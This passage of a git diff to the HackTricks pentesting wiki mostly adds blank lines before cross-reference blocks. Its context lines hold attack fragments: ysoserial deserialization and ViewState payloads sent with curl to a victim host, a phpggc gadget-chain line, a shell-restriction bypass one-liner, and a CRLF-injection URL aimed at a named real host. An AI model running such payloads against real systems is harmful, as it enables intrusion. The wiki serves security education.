https://graphql-dashboard.herokuapp.com/ {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md b/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md index 7d8fddfac..199b41d45 100644 --- a/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md +++ b/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md @@ -45,6 +45,7 @@ ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" | ``` For an in-depth explanation on abusing ASP.NET ViewState read: + {{#ref}} ../../pentesting-web/deserialization/exploiting-__viewstate-parameter.md {{#endref}} @@ -176,6 +177,7 @@ proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powers ## Related tricks * IIS post-exploitation & web.config abuse: + {{#ref}} ../../network-services-pentesting/pentesting-web/iis-internet-information-services.md {{#endref}} @@ -188,4 +190,4 @@ proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powers - [Unit42 – Project AK47 / SharePoint Exploitation & Ransomware Activity](https://unit42.paloaltonetworks.com/ak47-activity-linked-to-sharepoint-vulnerabilities/) - [Microsoft Security Advisory – CVE-2025-53770 / 53771](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-53770) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/nextjs.md b/src/network-services-pentesting/pentesting-web/nextjs.md index 4a878b05f..699fef29f 100644 --- a/src/network-services-pentesting/pentesting-web/nextjs.md +++ b/src/network-services-pentesting/pentesting-web/nextjs.md @@ -827,6 +827,7 @@ export const config = { Attackers can craft malicious websites that make requests to your API, potentially abusing functionalities like data retrieval, data manipulation, or triggering unwanted actions on behalf of authenticated users. + {{#ref}} ../../pentesting-web/cors-bypass.md {{#endref}} @@ -1270,4 +1271,3 @@ const HeavyComponent = dynamic(() => import("../components/HeavyComponent"), { {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/nginx.md b/src/network-services-pentesting/pentesting-web/nginx.md index 4bedf3b27..0be085fe7 100644 --- a/src/network-services-pentesting/pentesting-web/nginx.md +++ b/src/network-services-pentesting/pentesting-web/nginx.md @@ -68,6 +68,7 @@ location = /admin/ { } ``` + {{#ref}} ../../pentesting-web/proxy-waf-protections-bypass.md {{#endref}} @@ -354,4 +355,3 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md index 220672ab5..8e12431f6 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md @@ -169,6 +169,7 @@ readfile($page); Check: + {{#ref}} ../../../pentesting-web/file-inclusion/ {{#endref}} @@ -220,6 +221,7 @@ In the following scenario the **attacker made the server throw some big errors** Check ther page: + {{#ref}} php-ssrf.md {{#endref}} @@ -399,6 +401,7 @@ echo "$x ${Da}"; //Da Drums If in a page you can **create a new object of an arbitrary class** you might be able to obtain RCE, check the following page to learn how: + {{#ref}} php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/python.md b/src/network-services-pentesting/pentesting-web/python.md index 626351c45..bb1996d65 100644 --- a/src/network-services-pentesting/pentesting-web/python.md +++ b/src/network-services-pentesting/pentesting-web/python.md @@ -12,14 +12,17 @@ test a possible **code execution**, using the function _str()_: ### Tricks + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md {{#endref}} + {{#ref}} ../../pentesting-web/ssti-server-side-template-injection/README.md {{#endref}} + {{#ref}} ../../pentesting-web/deserialization/README.md {{#endref}} @@ -27,4 +30,3 @@ test a possible **code execution**, using the function _str()_: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/special-http-headers.md b/src/network-services-pentesting/pentesting-web/special-http-headers.md index 554e6487a..bd825fee0 100644 --- a/src/network-services-pentesting/pentesting-web/special-http-headers.md +++ b/src/network-services-pentesting/pentesting-web/special-http-headers.md @@ -39,6 +39,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b - `Connection: close, X-Forwarded-For` + {{#ref}} ../../pentesting-web/abusing-hop-by-hop-headers.md {{#endref}} @@ -48,6 +49,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b - `Content-Length: 30` - `Transfer-Encoding: chunked` + {{#ref}} ../../pentesting-web/http-request-smuggling/ {{#endref}} @@ -63,6 +65,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b - **`Age`** defines the times in seconds the object has been in the proxy cache. - **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached + {{#ref}} ../../pentesting-web/cache-deception/ {{#endref}} @@ -125,6 +128,7 @@ This means the file named "filename.jpg" is intended to be downloaded and saved. ### Content Security Policy (CSP) + {{#ref}} ../../pentesting-web/content-security-policy-csp-bypass/ {{#endref}} @@ -241,4 +245,3 @@ The headers reach the `exec` component unfiltered, resulting in remote command e {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/symphony.md b/src/network-services-pentesting/pentesting-web/symphony.md index b7846e423..deb6cb5fb 100644 --- a/src/network-services-pentesting/pentesting-web/symphony.md +++ b/src/network-services-pentesting/pentesting-web/symphony.md @@ -73,6 +73,7 @@ Symfony is one of the most widely-used PHP frameworks and regularly appears in a ### 5. Symfony 1 gadget chains (still found in legacy apps) * `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`. Check file-upload endpoints and `phar://` wrappers. + {{#ref}} ../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md index b306fc680..b340a831d 100644 --- a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md +++ b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md @@ -44,6 +44,7 @@ Note that even if this was done for AWS machines, it could be done for any other For a better description of this process check: + {{#ref}} https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/werkzeug.md b/src/network-services-pentesting/pentesting-web/werkzeug.md index aa9242640..30fb71e6b 100644 --- a/src/network-services-pentesting/pentesting-web/werkzeug.md +++ b/src/network-services-pentesting/pentesting-web/werkzeug.md @@ -161,6 +161,7 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a ## Automated Exploitation + {{#ref}} https://github.com/Ruulian/wconsole_extractor {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 416a8b034..519327296 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -249,6 +249,7 @@ This is the response when it doesn't work: ## SSRF + {{#ref}} https://github.com/t0gu/quickpress/blob/master/core/requests.go {{#endref}} diff --git a/src/pentesting-web/account-takeover.md b/src/pentesting-web/account-takeover.md index 35ccfa25b..d8050b064 100644 --- a/src/pentesting-web/account-takeover.md +++ b/src/pentesting-web/account-takeover.md @@ -21,6 +21,7 @@ As explained in [**this talk**](https://www.youtube.com/watch?v=CiIyaZ3x49c), th For further details, refer to the document on Unicode Normalization: + {{#ref}} unicode-injection/unicode-normalization.md {{#endref}} @@ -39,6 +40,7 @@ Should the target system allow the **reset link to be reused**, efforts should b If the page contains **CORS misconfigurations** you might be able to **steal sensitive information** from the user to **takeover his account** or make him change auth information for the same purpose: + {{#ref}} cors-bypass.md {{#endref}} @@ -47,6 +49,7 @@ cors-bypass.md If the page is vulnerable to CSRF you might be able to make the **user modify his password**, email or authentication so you can then access it: + {{#ref}} csrf-cross-site-request-forgery.md {{#endref}} @@ -55,6 +58,7 @@ csrf-cross-site-request-forgery.md If you find a XSS in application you might be able to steal cookies, local storage, or info from the web page that could allow you takeover the account: + {{#ref}} xss-cross-site-scripting/ {{#endref}} @@ -63,12 +67,14 @@ xss-cross-site-scripting/ If you find a limited XSS or a subdomain take over, you could play with the cookies (fixating them for example) to try to compromise the victim account: + {{#ref}} hacking-with-cookies/ {{#endref}} ## **Attacking Password Reset Mechanism** + {{#ref}} reset-password.md {{#endref}} @@ -79,6 +85,7 @@ If the authentication response could be **reduced to a simple boolean just try t ## OAuth to Account takeover + {{#ref}} oauth-to-account-takeover.md {{#endref}} @@ -129,4 +136,3 @@ With the new login, although different cookies might be generated the old ones b {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/README.md b/src/pentesting-web/browser-extension-pentesting-methodology/README.md index 33a6452bd..ade731991 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/README.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/README.md @@ -276,6 +276,7 @@ As browser extensions can be so **privileged**, a malicious one or one being com Check how these settings work and how they could get abused in: + {{#ref}} browext-permissions-and-host_permissions.md {{#endref}} @@ -292,6 +293,7 @@ script-src 'self'; object-src 'self'; For more info about CSP and potential bypasses check: + {{#ref}} ../content-security-policy-csp-bypass/ {{#endref}} @@ -335,6 +337,7 @@ Although, if the `manifest.json` parameter **`use_dynamic_url`** is used, this * Being allowed to access these pages make these pages **potentially vulnerable ClickJacking**: + {{#ref}} browext-clickjacking.md {{#endref}} @@ -496,6 +499,7 @@ A secure Post Message communication should check the authenticity of the receive The previous checks, even if performed, could be vulnerable, so check in the following page **potential Post Message bypasses**: + {{#ref}} ../postmessage-vulnerabilities/ {{#endref}} @@ -504,6 +508,7 @@ The previous checks, even if performed, could be vulnerable, so check in the fol Another possible way of communication might be through **Iframe URLs**, you can find an example in: + {{#ref}} browext-xss-example.md {{#endref}} @@ -514,6 +519,7 @@ This isn't "exactly" a communication way, but the **web and the content script w You can also find an example of a **DOM based XSS to compromise a browser extension** in: + {{#ref}} browext-xss-example.md {{#endref}} @@ -757,4 +763,3 @@ Project Neto is a Python 3 package conceived to analyse and unravel hidden featu {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md index ea330373d..9f8f4752e 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md @@ -7,6 +7,7 @@ This page is going to abuse a ClickJacking vulnerability in a Browser extension.\ If you don't know what ClickJacking is check: + {{#ref}} ../clickjacking.md {{#endref}} @@ -89,6 +90,7 @@ A [**blog post about a ClickJacking in metamask can be found here**](https://slo Check the following page to check how a **XSS** in a browser extension was chained with a **ClickJacking** vulnerability: + {{#ref}} browext-xss-example.md {{#endref}} @@ -100,4 +102,3 @@ browext-xss-example.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md index 8a555208c..f50ee304f 100644 --- a/src/pentesting-web/cache-deception/README.md +++ b/src/pentesting-web/cache-deception/README.md @@ -29,6 +29,7 @@ If you are thinking that the response is being stored in a cache, you could try You can find more options in: + {{#ref}} cache-poisoning-to-dos.md {{#endref}} @@ -77,6 +78,7 @@ _Note that this will poison a request to `/en?region=uk` not to `/en`_ ### Cache poisoning to DoS + {{#ref}} cache-poisoning-to-dos.md {{#endref}} @@ -105,6 +107,7 @@ Note that if the vulnerable cookie is very used by the users, regular requests w Check: + {{#ref}} cache-poisoning-via-url-discrepancies.md {{#endref}} @@ -115,6 +118,7 @@ cache-poisoning-via-url-discrepancies.md This is also explained better in: + {{#ref}} cache-poisoning-via-url-discrepancies.md {{#endref}} @@ -250,4 +254,3 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/captcha-bypass.md b/src/pentesting-web/captcha-bypass.md index c2f59772a..4c70d6064 100644 --- a/src/pentesting-web/captcha-bypass.md +++ b/src/pentesting-web/captcha-bypass.md @@ -32,6 +32,7 @@ To **bypass** the captcha during **server testing** and automate user input func [**CapSolver**](https://www.capsolver.com/?utm_source=google&utm_medium=ads&utm_campaign=scraping&utm_term=hacktricks&utm_content=captchabypass) is an AI-powered service that specializes in solving various types of captchas automatically, empowers data collection by helping developers easily overcome the captcha challenges encountered during Web Scraping. It supports captchas such as **reCAPTCHA V2, reCAPTCHA V3, DataDome, AWS Captcha, Geetest, and Cloudflare turnstile among others**. For developers, Capsolver offers API integration options detailed in [**documentation**](https://docs.capsolver.com/?utm_source=github&utm_medium=banner_github&utm_campaign=fcsrv)**,** facilitating the integration of captcha solving into applications. They also provide browser extensions for [Chrome](https://chromewebstore.google.com/detail/captcha-solver-auto-captc/pgojnojmmhpofjgdmaebadhbocahppod) and [Firefox](https://addons.mozilla.org/es/firefox/addon/capsolver-captcha-solver/), making it easy to use their service directly within a browser. Different pricing packages are available to accommodate varying needs, ensuring flexibility for users. + {{#ref}} https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks {{#endref}} diff --git a/src/pentesting-web/client-side-template-injection-csti.md b/src/pentesting-web/client-side-template-injection-csti.md index dacf8a5f1..0d3944a1e 100644 --- a/src/pentesting-web/client-side-template-injection-csti.md +++ b/src/pentesting-web/client-side-template-injection-csti.md @@ -81,6 +81,7 @@ javascript:alert(1)%252f%252f..%252fcss-images ## **Brute-Force Detection List** + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt {{#endref}} diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 1eb7b3d9e..678e0772a 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -35,6 +35,7 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful If you are trying to execute **arbitrary commands inside a linux machine** you will be interested to read about this **Bypasses:** + {{#ref}} ../linux-hardening/bypass-bash-restrictions/ {{#endref}} @@ -125,6 +126,7 @@ powershell C:**2\n??e*d.*? # notepad #### Linux + {{#ref}} ../linux-hardening/bypass-bash-restrictions/ {{#endref}} @@ -157,6 +159,7 @@ Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an una ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt {{#endref}} diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md index ae5d26450..1103d2624 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md @@ -119,6 +119,7 @@ Working payload: `"/>` #### self + 'unsafe-inline' via Iframes + {{#ref}} csp-bypass-self-+-unsafe-inline-with-iframes.md {{#endref}} @@ -409,6 +410,7 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin. ### Iframes JS execution + {{#ref}} ../xss-cross-site-scripting/iframes-in-xss-and-csp.md {{#endref}} @@ -522,6 +524,7 @@ You could also abuse this configuration to **load javascript code inserted insid Service workers **`importScripts`** function isn't limited by CSP: + {{#ref}} ../xss-cross-site-scripting/abusing-service-workers.md {{#endref}} @@ -705,6 +708,7 @@ setTimeout(function () { SOME is a technique that abuses an XSS (or highly limited XSS) **in an endpoint of a page** to **abuse** **other endpoints of the same origin.** This is done by loading the vulnerable endpoint from an attacker page and then refreshing the attacker page to the real endpoint in the same origin you want to abuse. This way the **vulnerable endpoint** can use the **`opener`** object in the **payload** to **access the DOM** of the **real endpoint to abuse**. For more information check: + {{#ref}} ../xss-cross-site-scripting/some-same-origin-method-execution.md {{#endref}} @@ -839,4 +843,3 @@ navigator.credentials.store( {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/cors-bypass.md b/src/pentesting-web/cors-bypass.md index d1e56ca3b..f304fad89 100644 --- a/src/pentesting-web/cors-bypass.md +++ b/src/pentesting-web/cors-bypass.md @@ -260,6 +260,7 @@ Access-Control-Allow-Credentials: true ### **Other funny URL tricks** + {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} @@ -344,6 +345,7 @@ One way to bypass the `Access-Control-Allow-Origin` restriction is by requesting You can **bypass CORS checks** such as `e.origin === window.origin` by **creating an iframe** and **from it opening a new window**. More information in the following page: + {{#ref}} xss-cross-site-scripting/iframes-in-xss-and-csp.md {{#endref}} @@ -445,4 +447,3 @@ You can find more information about the previous bypass techniques and how to us {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/crlf-0d-0a.md b/src/pentesting-web/crlf-0d-0a.md index 4c896e899..add9b6765 100644 --- a/src/pentesting-web/crlf-0d-0a.md +++ b/src/pentesting-web/crlf-0d-0a.md @@ -84,6 +84,7 @@ http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:te Check more examples in: + {{#ref}} https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md {{#endref}} @@ -151,6 +152,7 @@ Afterward, a second request can be specified. This scenario typically involves [ Memcache is a **key-value store that uses a clear text protocol**. More info in: + {{#ref}} ../network-services-pentesting/11211-memcache/ {{#endref}} diff --git a/src/pentesting-web/csrf-cross-site-request-forgery.md b/src/pentesting-web/csrf-cross-site-request-forgery.md index 2b029b5a8..1b7dd7d04 100644 --- a/src/pentesting-web/csrf-cross-site-request-forgery.md +++ b/src/pentesting-web/csrf-cross-site-request-forgery.md @@ -160,6 +160,7 @@ This ensures the 'Referer' header is omitted, potentially bypassing validation c **Regexp bypasses** + {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} @@ -689,4 +690,3 @@ with open(PASS_LIST, "r") as f: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md index c9445898b..911bec500 100644 --- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md +++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md @@ -237,6 +237,7 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup This is a **mix** between **dangling markup and XS-Leaks**. From one side the vulnerability allows to **inject HTML** (but not JS) in a page of the **same origin** of the one we will be attacking. On the other side we won't **attack** directly the page where we can inject HTML, but **another page**. + {{#ref}} ss-leaks.md {{#endref}} @@ -245,12 +246,14 @@ ss-leaks.md XS-Search are oriented to **exfiltrate cross-origin information** abusing **side channel attacks**.Therefore, it's a different technique than Dangling Markup, however, some of the techniques abuse the inclusion of HTML tags (with and without JS execution), like [**CSS Injection**](../xs-search/index.html#css-injection) or [**Lazy Load Images**](../xs-search/index.html#image-lazy-loading)**.** + {{#ref}} ../xs-search/ {{#endref}} ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt {{#endref}} diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md index 9cf3f8d08..b6c69d179 100644 --- a/src/pentesting-web/deserialization/README.md +++ b/src/pentesting-web/deserialization/README.md @@ -98,6 +98,7 @@ You can read an explained **PHP example here**: [https://www.notsosecure.com/rem You could abuse the PHP autoload functionality to load arbitrary php files and more: + {{#ref}} php-deserialization-+-autoload-classes.md {{#endref}} @@ -188,6 +189,7 @@ So, if you can, check the `phpinfo()` of the server and **search on the internet If you have found a LFI that is just reading the file and not executing the php code inside of it, for example using functions like _**file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize()**_**.** You can try to abuse a **deserialization** occurring when **reading** a **file** using the **phar** protocol.\ For more information read the following post: + {{#ref}} ../file-inclusion/phar-deserialization.md {{#endref}} @@ -211,6 +213,7 @@ Before checking the bypass technique, try using `print(base64.b64encode(pickle.d For more information about escaping from **pickle jails** check: + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}} @@ -219,12 +222,14 @@ For more information about escaping from **pickle jails** check: The following page present the technique to **abuse an unsafe deserialization in yamls** python libraries and finishes with a tool that can be used to generate RCE deserialization payload for **Pickle, PyYAML, jsonpickle and ruamel.yaml**: + {{#ref}} python-yaml-deserialization.md {{#endref}} ### Class Pollution (Python Prototype Pollution) + {{#ref}} ../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md {{#endref}} @@ -266,6 +271,7 @@ test_then() If you want to learn about this technique **take a look to the following tutorial**: + {{#ref}} nodejs-proto-prototype-pollution/ {{#endref}} @@ -694,6 +700,7 @@ ObjectInputFilter.Config.setSerialFilter(filter); Find whats is **JNDI Injection, how to abuse it via RMI, CORBA & LDAP and how to exploit log4shell** (and example of this vuln) in the following page: + {{#ref}} jndi-java-naming-and-directory-interface-and-log4shell.md {{#endref}} @@ -1085,4 +1092,3 @@ Using the arbitrary file write vulnerability, the attacker writes the crafted ca {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index 6aa114c8f..dcda7f694 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md @@ -265,10 +265,7 @@ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \ | curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx ``` -Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. {{#ref}} - - -{{#endref}} +Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. ## References @@ -289,4 +286,3 @@ Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md index 4842959a8..f31e4d0e9 100644 --- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md +++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md @@ -225,6 +225,7 @@ customer.__proto__.toString = ()=>{alert("polluted")} ### Proto Pollution to RCE + {{#ref}} prototype-pollution-to-rce.md {{#endref}} @@ -235,6 +236,7 @@ Other payloads: ## Client-side prototype pollution to XSS + {{#ref}} client-side-prototype-pollution.md {{#endref}} diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md index 8aa38e9a1..328bb0e93 100644 --- a/src/pentesting-web/file-inclusion/README.md +++ b/src/pentesting-web/file-inclusion/README.md @@ -23,6 +23,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../ **Mixing several \*nix LFI lists and adding more paths I have created this one:** + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt {{#endref}} @@ -36,6 +37,7 @@ A list that uses several techniques to find the file /etc/password (to check if Merge of different wordlists: + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt {{#endref}} @@ -414,6 +416,7 @@ For a detailed understanding of exploiting deserialization vulnerabilities in th [Phar Deserialization Exploitation Guide](phar-deserialization.md) + {{#ref}} phar-deserialization.md {{#endref}} @@ -645,6 +648,7 @@ NOTE: the payload is "" This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file. + {{#ref}} lfi2rce-via-php-filters.md {{#endref}} @@ -653,6 +657,7 @@ lfi2rce-via-php-filters.md **Upload** a file that will be stored as **temporary** in `/tmp`, then in the **same request,** trigger a **segmentation fault**, and then the **temporary file won't be deleted** and you can search for it. + {{#ref}} lfi2rce-via-segmentation-fault.md {{#endref}} @@ -661,6 +666,7 @@ lfi2rce-via-segmentation-fault.md If you found a **Local File Inclusion** and **Nginx** is running in front of PHP you might be able to obtain RCE with the following technique: + {{#ref}} lfi2rce-via-nginx-temp-files.md {{#endref}} @@ -669,6 +675,7 @@ lfi2rce-via-nginx-temp-files.md If you found a **Local File Inclusion** even if you **don't have a session** and `session.auto_start` is `Off`. If you provide the **`PHP_SESSION_UPLOAD_PROGRESS`** in **multipart POST** data, PHP will **enable the session for you**. You could abuse this to get RCE: + {{#ref}} via-php_session_upload_progress.md {{#endref}} @@ -677,6 +684,7 @@ via-php_session_upload_progress.md If you found a **Local File Inclusion** and and the server is running in **Windows** you might get RCE: + {{#ref}} lfi2rce-via-temp-file-uploads.md {{#endref}} @@ -704,6 +712,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php If you found a **Local File Inclusion** and a file exposing **phpinfo()** with file_uploads = on you can get RCE: + {{#ref}} lfi2rce-via-phpinfo.md {{#endref}} @@ -712,6 +721,7 @@ lfi2rce-via-phpinfo.md If you found a **Local File Inclusion** and you **can exfiltrate the path** of the temp file BUT the **server** is **checking** if the **file to be included has PHP marks**, you can try to **bypass that check** with this **Race Condition**: + {{#ref}} lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md {{#endref}} @@ -720,6 +730,7 @@ lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md If you can abuse the LFI to **upload temporary files** and make the server **hang** the PHP execution, you could then **brute force filenames during hours** to find the temporary file: + {{#ref}} lfi2rce-via-eternal-waiting.md {{#endref}} diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md index 9a45d0c5e..6e27e1a3c 100644 --- a/src/pentesting-web/file-inclusion/phar-deserialization.md +++ b/src/pentesting-web/file-inclusion/phar-deserialization.md @@ -67,6 +67,7 @@ php vuln.php ### References + {{#ref}} https://blog.ripstech.com/2018/new-php-exploitation-technique/ {{#endref}} diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index 0b63f0a41..b0e8b39ac 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md @@ -199,6 +199,7 @@ Here’s a top 10 list of things that you can achieve by uploading (from [here]( #### Burp Extension + {{#ref}} https://github.com/portswigger/upload-scanner {{#endref}} diff --git a/src/pentesting-web/hacking-jwt-json-web-tokens.md b/src/pentesting-web/hacking-jwt-json-web-tokens.md index 6f47ad254..ed585238c 100644 --- a/src/pentesting-web/hacking-jwt-json-web-tokens.md +++ b/src/pentesting-web/hacking-jwt-json-web-tokens.md @@ -244,6 +244,7 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999) ### JWT Registered claims + {{#ref}} https://www.iana.org/assignments/jwt/jwt.xhtml#claims {{#endref}} @@ -264,9 +265,9 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are ### Tools + {{#ref}} https://github.com/ticarpi/jwt_tool {{#endref}} {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/hacking-with-cookies/README.md b/src/pentesting-web/hacking-with-cookies/README.md index cd5d0dfab..faf47cdc2 100644 --- a/src/pentesting-web/hacking-with-cookies/README.md +++ b/src/pentesting-web/hacking-with-cookies/README.md @@ -64,6 +64,7 @@ This avoids the **client** to access the cookie (Via **Javascript** for example: - Another way is the exploitation of zero/day vulnerabilities of the browsers. - It's possible to **overwrite HttpOnly cookies** by performing a Cookie Jar overflow attack: + {{#ref}} cookie-jar-overflow.md {{#endref}} @@ -115,6 +116,7 @@ In this scenario, an attacker tricks a victim into using a specific cookie to lo If you found an **XSS in a subdomain** or you **control a subdomain**, read: + {{#ref}} cookie-tossing.md {{#endref}} @@ -125,6 +127,7 @@ Here, the attacker convinces the victim to use the attacker's session cookie. Th If you found an **XSS in a subdomain** or you **control a subdomain**, read: + {{#ref}} cookie-tossing.md {{#endref}} @@ -328,4 +331,3 @@ There should be a pattern (with the size of a used block). So, knowing how are a {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md index 14136ce78..09fef92f0 100644 --- a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md +++ b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md @@ -37,6 +37,7 @@ Possible protection against this attack would be that the **web server won't acc To bypass the scenario where the attacker is setting a cookie after the victim was already given the cookie, the attacker could cause a **cookie overflow** and then, once the **legit cookie is deleted, set the malicious one**. + {{#ref}} cookie-jar-overflow.md {{#endref}} @@ -47,6 +48,7 @@ Another useful **bypass** could be to **URL encode the name of the cookie** as s A Cookie Tossing attack may also be used to perform a **Cookie Bomb** attack: + {{#ref}} cookie-bomb.md {{#endref}} @@ -68,4 +70,3 @@ cookie-bomb.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/http-request-smuggling/README.md b/src/pentesting-web/http-request-smuggling/README.md index 0638cbfa9..7809e8033 100644 --- a/src/pentesting-web/http-request-smuggling/README.md +++ b/src/pentesting-web/http-request-smuggling/README.md @@ -200,6 +200,7 @@ Connection: Content-Length For **more information about hop-by-hop headers** visit: + {{#ref}} 